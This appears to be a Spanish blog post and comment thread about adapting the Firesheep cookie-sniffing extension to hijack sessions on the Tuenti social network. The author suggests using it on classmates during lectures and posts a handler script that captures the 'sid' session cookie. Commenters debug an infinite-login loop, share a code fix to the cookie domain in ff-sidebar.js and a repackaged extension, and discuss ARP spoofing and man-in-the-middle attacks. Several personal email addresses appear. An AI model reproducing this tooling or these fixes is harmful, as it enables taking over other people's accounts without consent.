Pues nada, muchachos, esta tarde me he bajado el firefox(sí, debo ser el único que prefiere Opera en este universo. xD) y nada, todo porque he visto por ahí el firesheep. En realidad no dice nada nuevo. Sniffer, solo que automáticamente introduce las cookies en el navegador. Lo hacía con el Opera a mano cuando me aburría. Pero esto abre un nuevo mundo de posibilidades en las clases monótonas, masificadas y terriblemente tediosas en las que vuestros interesados compañeros se meten al tuenti.
Como podréis ver, es un chollazo. Ah, no, que tuenti es una red puramente española. Así que...bueno, esta tarde noche me he puesto con ello y he creado una versión para tuenti. No es gran cosa, me falta conseguir la imagen, pero teniendo en cuenta que no conozco javascript, me doy por vencido por hoy.
Ojo, el firesheep funciona? Pues...dudosamente. DIcen que en redes sin password. Dicen que si tienes una tarjeta que se ponga en modo monitos y vaya...
Yo, personalmente, prefiero macSpoofing, que ya dejé un código en C++ por ahí abajo para hacerlo.
Os dejo el código y no me enrollo más. Si tenéis dudas de cómo hacer arpSpoofing, arpFlooding o lo que sea, me dejáis un comment.
Todo esto para fines didácticos. Claro. Ah, pensabas robarle la cuenta a alguien? MONSTRUO!!! Pero bueno, mejor que que robes música.
Je.
// Authors:// Paranoia//Version experimental, no consigo obtener el id de la imagen//ni el id del user_nameregister({name: 'Tuenti',url: 'http://www.tuenti.com/index.php',domains: [ 'tuenti.com' ],sessionCookieNames: ['sid' ],icon:'http://estaticosak1.tuenti.com/layout/web2-Zero/images/5_favicon.165a6922f9.png',identifyUser: function () {var resp = this.httpGet(this.siteUrl);}});
Funciona casi bien, pero capturo la sesión, y entra en un bucle y se reinicia cada vez que se carga...
ResponderEliminarYa, eso es algo que todavía no he averiguado por qué pasa. Si lo soluciono volveré a subirlo.
ResponderEliminarecharme un cable para k funcione k se queda en buscar pero no encuentra nada
EliminarNo sabes porque entra en el bucle? xDDD, no puedo solucionarlo :)
ResponderEliminarSé dónde falla. O eso creo, porque leer entre el código de tuenti es una odisea. En principio hay un if(window.top !== self) reload();
ResponderEliminar(el reload no està así, pero más o menos.
Ya no sé desde el firesheep cómo modificarlo. Si tenéis alguna idea. Yo le he plantado un "window.top = self" pero claro...ehm...no funciona xD
De todas formas no me he puesto a ello. Analizaré el código de otros scripts a ver si saco algo.
Yo he estado tocando, capturando mas cookies no solo el sid, y sigo fallando, con el firebug puedes ver que variables usa y como son las llamadas y donde falla, pero me pierdo. A ver si lo desciframos.
ResponderEliminarEstoi a la espera de que saqueis algo, me gustaria investigar un poco con esto... en la red de la universidad es una pasada, captura muchisimo pero no puedo hacer nada interesante!!
ResponderEliminarHola a todos, yo tambien he estado haciendo pruebas con Tuenti y al pricipio me ocurria lo mismo (bucle infinito de login). Pero creo haber encontrado el problema, resulta que al inyectar las cookies al navegador pone como dominio asociado '.www.tuenti.com' cosa que seria normal (ya que en facebook funciona de la misma manera), pero que en el caso de tuenti produce el bucle infinito. Sin embargo si como dominio de accion utilizamos '.tuenti.com' asociando la cookie al dominio y a todos los subdominios, no da problemas.
ResponderEliminarYo ahora estoy mirando como lo hace el codigo de firesheep para modificarlo, aunque aun ando un poco perdido.
De igual manera sigo buscando la imagen y el nombre de usuario para poder mostrarlos al capturar una sesion.
Para KurrÖ, espero que con algo interesante te refieras a advertir de la inseguridad de sus conexiones a los usuarios...¬¬
Problema arreglado...
ResponderEliminarcoño arreglao? XD
ResponderEliminardinos como x), que yo ke soy nowi no lo veo :D
Como lo arreglaste? era del dominio?
ResponderEliminarEfectivamente, encontre en el codigo donde asignaba el dominio a la cookie y ya solo asigna la direccion sin el "www" haciendola ascesible tambien a los subdominios.
ResponderEliminarSi alguien quiere saber como, que deje su direccion y le escribo un correo explicandolo ;).
hola yo no ay manera humana de hacer funcionar firesheep si algien me lo explica que debo tocar para el codigo pero codigo pongo para k cirule el facebook saludos
EliminarMe las e apañado y estoy corriendo el Firesheep desde ubuntu jeje...
ResponderEliminarPodrías dejar el codigo javascript del tuenti?o explicar un poco que parte es la que cambiaste??
Supongo que a parte del "sid" tambien hará falta algo más ,no??
Saludos
Lo has hecho funcionar en linux?, pues me vas a tener que explicar como ^^. Lo de el codigo javascript para el Tuenti es el mismo que hay en esta pagina (aunque yo tambien uso el 'cu' aunque no es necesario). El problema estaba el el archivo ff-sidebar.js. En la funcion "onResultDoubleClick" hay que sustituir "cookieUri.host;" por "cookieUri.host.replace("www.","");".
ResponderEliminarAsi de sencillo, bueno ahora tu si puedes explicame como hacerlo funcionar en linux (si quieres hazlo a esta direccion provisional dinerobymail@gmail.com).
Saludos
me encuentro en mi instituto jeje,en cuanto llegue a casa te mando un mail explicandotelo un poco.Prometido xD.
ResponderEliminarTienes tu respuesta a como instalarlo en esta dirección:
ResponderEliminarhttp://pastebin.com/WrW99TsW
PD: E modificado los dos .js que comentas,pero ni siquiera aparece nada cuando entro a Tuenti...A parte tampoco tengo mucha idea sobre javascript,solo algúnas nociones básicas de validar formularios etc...
Podrías subir el .xpi para Win modificado a cualquier server,sería un puntazo,grácias.Saludos..
PD2:AL autor del blog:perdon por utilizar tu blog como foro,jeje..Eres Valencia?no?perque e vist altres posts on escrius en valenciá..
Ahi tienes el .xpi, ocupa un poco mas de la cuenta por que al volver a empaquetarlo no he podido comprimirlo mejor.
ResponderEliminarGracias por el de linux, pero me referia a que cambios has hecho en el codigo para hacerlo compatible o instalable en linux, si no te importa explicarmelo te lo agradeceria.
http://www.mediafire.com/?g2a3rj22i390i3j
Saludos ;)
P.D. Por eso escribi mi mail, para no molestar mas aqui ^^.
jeje,vale,enseguida te respondo a tu mail.
ResponderEliminarGracas y Saludos
A mi el de linux también me interesa. Si lo puedes copiar aquí o enviármelo al correo delirios.autorreferentes@gmail.com
ResponderEliminarP.D.: Sí, soc de valència, ens coneixem?? si?? no??..xD No passa res per utilitzar açò de foro, si podem treure algo de profit.
Para utilizar el de linux mira el enlace de pastebin,así es como lo e instalado yo,no tengo mucha idea de Linux,Pero tal y como lo explico en el enlace,e lo e instalado en Ubuntu 10.10,y en Backtrack4 R1...
ResponderEliminarhttp://pastebin.com/WrW99TsW
El Script de Tuenti,no me funciona,ni en Win ni en Linux,e intentado hacer un Man in the middle con Cain, y con Ettercap,pero nada jeje..
...No crec que ens conegam,jeje,pero e vist altres posts teus en valenciá i ma llamát la atenció..Soc de un poble que es diu Aielo de Malferit,provincia de Valencia...Estudie segon de ASI(cicle superior) en un institud de Xátiva..jeje..el meu correu es joker11@gmx.es si neçessites cualquier cosa pots escriurem allí,o así,on vulgues..
explicamelo!! tengo un mac y es facil ya que no me hace falta ningun software adicional solo el firefox y el complemento... el codigo quedaria asi??:
ResponderEliminar// Authors:
// Paranoia
//Version experimental, no consigo obtener el id de la imagen
//ni el id del user_name
register({
name: 'Tuenti',
url: 'http://www.tuenti.com',
domains: [ '.tuenti.com' ],
sessionCookieNames: ['sid' ],
icon:'http://estaticosak1.tuenti.com/layout/web2-Zero/images/5_favicon.165a6922f9.png',
identifyUser: function () {
var resp = this.httpGet(this.siteUrl);
}
});
Hola yo también quiero la solución por favor, mi mail es jorgegn.gn@gmail.com muchas gracias :-D
ResponderEliminarwww.tuentivisitas.com esta tremendo !!
ResponderEliminar